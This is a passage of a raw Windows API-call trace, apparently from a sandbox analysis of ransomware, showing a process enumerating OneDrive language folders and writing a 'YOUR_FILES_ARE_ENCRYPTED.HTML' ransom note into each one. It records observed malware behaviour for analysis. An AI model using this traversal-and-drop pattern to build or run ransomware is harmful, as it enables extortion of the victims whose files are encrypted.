pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.003] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.006] CloseHandle (hObject=0x5b8) returned 1 [0162.006] GetProcessHeap () returned 0x270000 [0162.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa-arab", cAlternateFileName="")) returned 1 [0162.007] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab") returned 79 [0162.007] GetProcessHeap () returned 0x270000 [0162.007] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.007] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab" [0162.007] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*" [0162.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7f48290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\FileSync.LocalizedResources.dll.mui") returned 115 [0162.008] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.008] lstrlenW (lpString=".mui") returned 4 [0162.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa815d5d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa815d5d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.008] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0162.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.009] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.011] CloseHandle (hObject=0x5b8) returned 1 [0162.012] GetProcessHeap () returned 0x270000 [0162.013] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.013] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pa-arab-pk", cAlternateFileName="PA-ARA~1")) returned 1 [0162.013] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk") returned 82 [0162.013] GetProcessHeap () returned 0x270000 [0162.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.013] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk" [0162.013] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*" [0162.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa815d5d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.013] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.014] lstrlenW (lpString=".mui") returned 4 [0162.014] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.014] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8398a70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8398a70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.014] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.014] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pa-arab-pk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pa-arab-pk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.014] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.017] CloseHandle (hObject=0x5b8) returned 1 [0162.017] GetProcessHeap () returned 0x270000 [0162.018] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.018] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pl", cAlternateFileName="")) returned 1 [0162.018] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl") returned 74 [0162.018] GetProcessHeap () returned 0x270000 [0162.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.018] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl" [0162.018] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*" [0162.018] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa8398a70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.019] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.019] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.019] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.019] lstrlenW (lpString=".mui") returned 4 [0162.019] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.019] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa85fa070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa85fa070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.019] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.019] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\pl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\pl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.020] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.022] CloseHandle (hObject=0x5b8) returned 1 [0162.023] GetProcessHeap () returned 0x270000 [0162.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.023] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="prs-af", cAlternateFileName="")) returned 1 [0162.023] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af") returned 78 [0162.023] GetProcessHeap () returned 0x270000 [0162.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.023] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af" [0162.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*" [0162.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa85fa070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.024] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\FileSync.LocalizedResources.dll.mui") returned 114 [0162.024] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.024] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.024] lstrlenW (lpString=".mui") returned 4 [0162.024] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.024] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa893feb0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa893feb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.024] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.025] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0162.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\prs-af\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\prs-af\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.025] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.028] CloseHandle (hObject=0x5b8) returned 1 [0162.028] GetProcessHeap () returned 0x270000 [0162.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.029] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa893feb0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa8b2f090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa8b2f090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="pt-br", cAlternateFileName="")) returned 1 [0162.029] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, 